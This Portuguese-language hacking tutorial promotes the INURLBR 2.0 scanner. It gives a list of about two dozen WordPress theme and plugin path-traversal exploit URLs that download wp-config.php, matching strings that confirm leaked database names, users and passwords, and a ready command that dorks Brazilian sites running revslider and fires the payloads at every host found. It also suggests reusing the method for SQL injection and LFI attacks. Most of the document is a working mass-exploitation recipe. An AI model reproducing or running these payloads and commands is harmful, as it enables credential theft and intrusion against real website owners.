SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.
============================================================
[!] LISTA DE STRING'S QUE SERÁ EXECUTADA(concatenada) PRA CADA ALVO ENCONTRADO.
- ['LIST_XPL_NAME']: = listxpl_wordpress_afd.txt
Conteúdo arquivo - URL XPL Wordpress Vulnerability Arbitrary File Download:
- /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
- /wp-content/force-download.php?file=../wp-config.php
- /wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
- /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
- /wp-content/themes/markant/download.php?file=../../wp-config.php
- /wp-content/themes/yakimabait/download.php?file=./wp-config.php
- /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
- /wp-content/themes/felis/download.php?file=../wp-config.php
- /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
- /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
- /wp-content/themes/epic/includes/download.php?file=wp-config.php
- /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
- /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
- /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
- /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
- /wp-content/themes/lote27/download.php?download=../../../wp-config.php
- /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
- /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
- /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
- /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
- /wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
- /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
- /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
--------------------------------------------------------------------------------------
[!] CMS WORDPRESS VALIDATION / INURLBR 2.0
Já possui tal validação por padrão padrão interno.
- ['CMS-WORDPRESS-01'] = "define('DB_NAME'";
- ['CMS-WORDPRESS-02'] = "define('DB_USER'";
- ['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
- ['CMS-WORDPRESS-04'] = "define('DB_HOST'";
--------------------------------------------------------------------------------------
[!] Running subprocesses:
--sub-file Subprocess performs an injection
strings in URLs found by the engine, via GET or POST.
Example: --sub-file {youfile}
Usage: --sub-file exploits_get.txt
--sub-get defines whether the strings coming from
--sub-file will be injected via GET.
Usage: --sub-get
--sub-post defines whether the strings coming from
--sub-file will be injected via POST.
Usage: --sub-get
[!] Descrição de comando usado:
- DEFINIR DORK: --dork 'DORK'
- DEFINIR ARQUIVO FONTE: -s 'output.txt'
- DEFINIR DORK: --sub-file 'file_subprocess.txt'
- FLAG TIPO REQUEST: --sub-get / FLAG
- FLAG FILTRO HOST: --unique / HOST ÚNICOS EM SEU RESULTADO
[!] COMMAND EXEC:
GO! GO! ~
php inurlbr.php --dork 'site:br "Index of /wp-content/plugins/revslider"' -s teste.txt --sub-file 'listxpl_wordpress_afd.txt' --sub-get --unique
--------------------------------------------------------------------------------------
Dá mesma forma que usei uns (strings/urls)xpls Wordpress, pode ser usado de outros CMS's...
ou URL's padrões para tentar gerar erros SQLI no server, Ataques LFI dá mesma forma..
[!] VÍDEO DEMONSTRATIVO:
Baixar scanner INURLBR 2.0:
https://github.com/googleinurl/SCANNER-INURLBR
- [+] AUTOR: googleINURL
- [+] Blog: http://blog.inurl.com.br
- [+] Twitter: https://twitter.com/googleinurl
- [+] Fanpage: https://fb.com/InurlBrasil
- [+] Pastebin http://pastebin.com/u/Googleinurl
- [+] GIT: https://github.com/googleinurl
- [+] PSS: http://packetstormsecurity.com/user/googleinurl
- [+] YOUTUBE: http://youtube.com/c/INURLBrasil
- [+] PLUS: http://google.com/+INURLBrasil
[ Neither war between hackers, nor peace for the system. ]